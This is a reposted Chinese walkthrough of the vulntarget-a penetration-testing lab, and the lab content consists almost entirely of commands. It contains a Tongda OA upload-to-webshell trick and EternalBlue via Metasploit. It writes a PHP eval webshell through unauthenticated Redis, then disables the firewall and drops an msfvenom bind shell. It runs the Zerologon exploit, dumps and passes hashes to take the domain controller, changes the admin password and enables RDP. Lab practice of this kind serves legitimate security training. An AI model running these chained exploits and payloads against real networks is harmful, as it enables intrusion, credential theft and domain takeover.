[vulntarget靶场] vulntarget-a

news2024/12/23 3:37:13

靶场地址:https://github.com/crow821/vulntarget

拓扑结构

在这里插入图片描述

信息收集

主机发现

netdiscover -r 192.168.127.0/24 -i eth0

在这里插入图片描述

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.127.130

在这里插入图片描述

访问目标80,发现为通达oa

在这里插入图片描述

WIN7漏洞利用

通达oa后台getshell

默认账号admin,空密码登录后台

在这里插入图片描述

点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录

在这里插入图片描述

点击系统管理 -> 附件管理 -> 添加存储目录

在这里插入图片描述

点击组织 -> 系统管理员 -> 上传附件

在这里插入图片描述

上传txt后缀文件,根据windows系统自动去掉.的特性,利用burp抓包修改文件后缀为.php.

在这里插入图片描述

文件上传到:http://192.168.127.130/im/2309/528190762.a.php,利用哥斯拉连接

在这里插入图片描述

在这里插入图片描述

CVE-2017-0144(永恒之蓝)

除了80端口的通达oa,目标还开放了445端口

msfdb run
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.127.130
run

在这里插入图片描述

内网渗透

查看win7网卡信息,发现存在另一个网段

在这里插入图片描述

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

利用msf的post/windows/gather/arp_scanner模块收集内网存活主机

use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24

在这里插入图片描述

利用auxiliary/server/socks_proxy模块开启socks代理

use auxiliary/server/socks_proxy
set version 4a
run

在这里插入图片描述

修改/etc/proxychains4.conf

在这里插入图片描述

利用proxychains4对内网10.0.20.99主机进行端口扫描

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99

在这里插入图片描述

在80端口发现phpinfo.php,得到网站根目录路径: C:/phpStudy/PHPTutorial/WWW/

在这里插入图片描述

redis未授权访问,写入webshell

proxychains4 redis-cli -h 10.0.20.99
config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 "<?php @eval($_POST['cmd'])?>"
save

在这里插入图片描述

proxychains4代理,利用哥斯拉连接

proxychains4 java -jar godzilla.jar

在这里插入图片描述

在这里插入图片描述

关闭win2016防火墙,上传msf生成的bind_shell

netsh advfirewall set allprofiles state off		#关闭防火墙

在这里插入图片描述

#msfvenom生成shell
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

在这里插入图片描述

利用哥斯拉上传

在这里插入图片描述

执行

.\shell.exe

在这里插入图片描述

msf上线

exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
run

在这里插入图片描述

win2016上发现另一个网段

在这里插入图片描述

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

发现win2016加入域,域名:vulntarget.com

在这里插入图片描述

查看域内主机

net group "Domain Computers" /domain

在这里插入图片描述

查看域控

net group "Domain Controllers" /domain

在这里插入图片描述

域控ip:10.0.10.110

ping -n 1 WIN2019

在这里插入图片描述

CVE-2020-1472上线域控

打空域控密码,exp:https://github.com/VoidSec/CVE-2020-1472

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

在这里插入图片描述

dump域控hash

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

在这里插入图片描述

wmiexec上线

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 ./administrator@10.0.10.110
net user administrator p-0p-0p-0 /domain		#修改域控密码
netsh advfirewall set allprofiles state off		#关防火墙

#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

连接3389

proxychains4 remmina

在这里插入图片描述

切换动态分辨率

在这里插入图片描述

在这里插入图片描述

恢复域控密码

保存注册表

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

在这里插入图片描述

下载.save文件到本地解密

lget sam.save
lget security.save
lget system.save

在这里插入图片描述

解密

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

还原密码

proxychains4 python reinstall_original_pw.py win2019 10.0.10.110 346669a9c17532da61e8b473cb880ff0

在这里插入图片描述

再次尝试dump域控hash,发现失败,证明已经还原

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1018311.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

运行软件报错msvcr100.dll丢失的解决方法,全面分析msvcr100.dll丢失问题

随着科技的飞速发展&#xff0c;计算机已经成为人们生活和工作中不可或缺的重要工具。然而&#xff0c;在使用计算机的过程中&#xff0c;难免会遇到一些令人困扰的问题&#xff0c;如计算机丢失 msvcr100.dll 文件就是其中之一。本文将详细介绍计算机丢失 msvcr100.dll 的困扰…

文件打开表有几个?——参考《王道考研》

一、 真题试练 解析&#xff1a; 二、关于文件打开表 三、 疑问&#xff1f; 不是说好的只维护一个文件打开表吗&#xff1f; 四、解答 OS维护的是总的文件打开表&#xff0c;各自用户由对应各自的打开表&#xff0c;所有用户的打开表组成OS总的打开表。

layui框架学习(45: 工具集模块)

layui的工具集模块util支持固定条、倒计时等组件&#xff0c;同时提供辅助函数处理时间数据、字符转义、批量事件处理等操作。   util模块中的fixbar函数支持设置固定条&#xff08;2.7版本的帮助文档中叫固定块&#xff09;&#xff0c;是指固定在页面一侧的工具条元素&…

swift 事件

多个元素链接到单个IBAction 并区分

图书信息管理系统

#include<stdio.h> #include<string.h> #include<stdlib.h> #define MAXSIZE 10000typedef struct {char no[100];//图书ISBNchar name[100];//图书名字double price;//图书价格 } Book;typedef struct {Book data[MAXSIZE];int length; } SqList,*PSqList;P…

算法基础:图

图论 图论〔Graph Theory〕是数学的一个分支。它以图为研究对象。图论中的图是由若干给定的点及连接两点的线所构成的图形&#xff0c;这种图形通常用来描述某些事物之间的某种特定关系&#xff0c;用点代表事物&#xff0c;用连接两点的线表示相应两个事物间具有这种关系。 …

Java实现Ip地址获取

Java实现Ip地址获取 一、两种实现方式二、测试结果 一、两种实现方式 package com.lyp;import org.apache.commons.lang3.ObjectUtils;import java.net.*; import java.util.ArrayList; import java.util.Enumeration; import java.util.List; import java.util.Optional;/***…

创建及编辑线要素

17. 创建及编辑线要素 17.1 功能讲解 所有QGIS按键&#xff0c;右下角带 * 的&#xff0c;都是新建的意思。下图中&#xff0c; File encoding尽量选择 System。可自定义字段&#xff0c;例如 ‘Btype’&#xff0c;可以用其以不同的标记区分省界和区界。 保存路径&#x…

「UG/NX」Block UI 指定矢量SpecifyVector

✨博客主页何曾参静谧的博客📌文章专栏「UG/NX」BlockUI集合📚全部专栏「UG/NX」NX二次开发「UG/NX」BlockUI集合「VS」Visual Studio「QT」QT5程序设计「C/C+&#

ES6中WeakMap和WeakSet

这里重点说一下它们和对应的set、map的区别 WeakSet 不能遍历,没有forEach&#xff0c;没有size只能添加对象垃圾回收器完全不考虑WeakSet对该对象的引用。 WeakMap 键只能是对象它的键存储的地址不会影响垃圾回收。 let obj {name: Tom,age: 20}let map new WeakMap();…

Linux安装Mysql(详细)

安装Mysql数据库 参考阿里云命令安装Mysql smartservice.console.aliyun.com/service/ser… 安装MySQL 1.远程连接ECS实例。 具体操作&#xff0c;请参见使用VNC登录实例。 2.运行以下命令&#xff0c;更新YUM源。 sudo rpm -Uvh https://dev.mysql.com/get/mysql80-com…

C++之this指针总结(二百二十)

简介&#xff1a; CSDN博客专家&#xff0c;专注Android/Linux系统&#xff0c;分享多mic语音方案、音视频、编解码等技术&#xff0c;与大家一起成长&#xff01; 优质专栏&#xff1a;Audio工程师进阶系列【原创干货持续更新中……】&#x1f680; 人生格言&#xff1a; 人生…

SpringBoot启动输出了Mybatis-plus和Pagehelper的图标的解决方法

SpringBoot启动输出了Mybatis-plus和Pagehelper的图标 解决方法 Mybatis-plus mybatis-plus可以通过下面的配置关闭图标输出 mybatis-plus:global-config:banner: false #启动时不输出mp的图标pagehelper pagehelper要麻烦一些&#xff0c;需要在jvm的启动参数中进行配置…

使用docker安装部署kuboard并导入k8s集群

1 官网地址 https://kuboard.cn/install/v3/install.html#kuboard-v3-x-%E7%89%88%E6%9C%AC%E8%AF%B4%E6%98%8E2 找到推荐的安装方式 先点击左上角的安装 3 进入安装引导页面 复制出来里面的docker 命令&#xff0c;根据需求修改外面端口映射&#xff0c;KUBOARD_ENDPOINT…

Docker安装ElasticSearch/ES 7.10.0

目录 前言安装ElasticSearch/ES安装步骤1&#xff1a;准备1. 安装docker2. 搜索可以使用的镜像。3. 也可从docker hub上搜索镜像。4. 选择合适的redis镜像。 安装步骤2&#xff1a;拉取ElasticSearch镜像1 拉取镜像2 查看已拉取的镜像 安装步骤3&#xff1a;创建容器创建容器方…

Chatgpt solve | 井底之蛙

这是一个经典的物理问题&#xff0c;我们可以使用Python来解决它。青蛙每分钟爬升4米&#xff0c;然后滑下2米&#xff0c;所以每分钟净爬升2米。 我们可以编写一个循环来模拟这个过程&#xff0c;直到青蛙爬出井口。下面是一个Python程序来解决这个问题&#xff1a; def time_…

算法通关村第二关——链表反转(黄金)

算法通关村第二关——链表反转黄金挑战 K 个一组翻转链表方法一&#xff1a;自己写的方法二&#xff1a;头插法 K 个一组翻转链表 25. K 个一组翻转链表 方法一&#xff1a;自己写的 我自己写的方式有点长&#xff0c;属于一点点一路路解决那种&#xff0c;其实用到的是穿针…

安卓抓jdwskey

安装京东&#xff0c;VNET VNET下载地址 https://www.vnet-tech.com/zh/ 2给权限 打开 VNET --点击右下角 ▶ --保存 CA.pem 证书 --打开手机系统设置搜索 证书–点击安装刚刚保存的 CA.pem 如果开始出现数据表示已经有权限抓包了&#xff0c;下面给权限跳过&#xff0c;直接开…

第15篇ESP32 idf框架 wifi联网_WiFi AP模式_手机连接到esp32开发板

第1篇:Arduino与ESP32开发板的安装方法 第2篇:ESP32 helloword第一个程序示范点亮板载LED 第3篇:vscode搭建esp32 arduino开发环境 第4篇:vscodeplatformio搭建esp32 arduino开发环境 ​​​​​​第5篇:doit_esp32_devkit_v1使用pmw呼吸灯实验 第6篇:ESP32连接无源喇叭播…

Haproxy集群调度器与部署

目录 一、Haproxy介绍&#xff1a; 1.Haproxy应用分析&#xff1a; 2.Haproxy的特性&#xff1a; 3.Haproxy常见的调度算法&#xff1a; 4.LVS、Nginx、HAproxy的区别&#xff1a; 4.1 Haproxy与lvs对比&#xff1a; 4.2 Haproxy与nginx对比&#xff1a; 5. Haproxy优点&#x…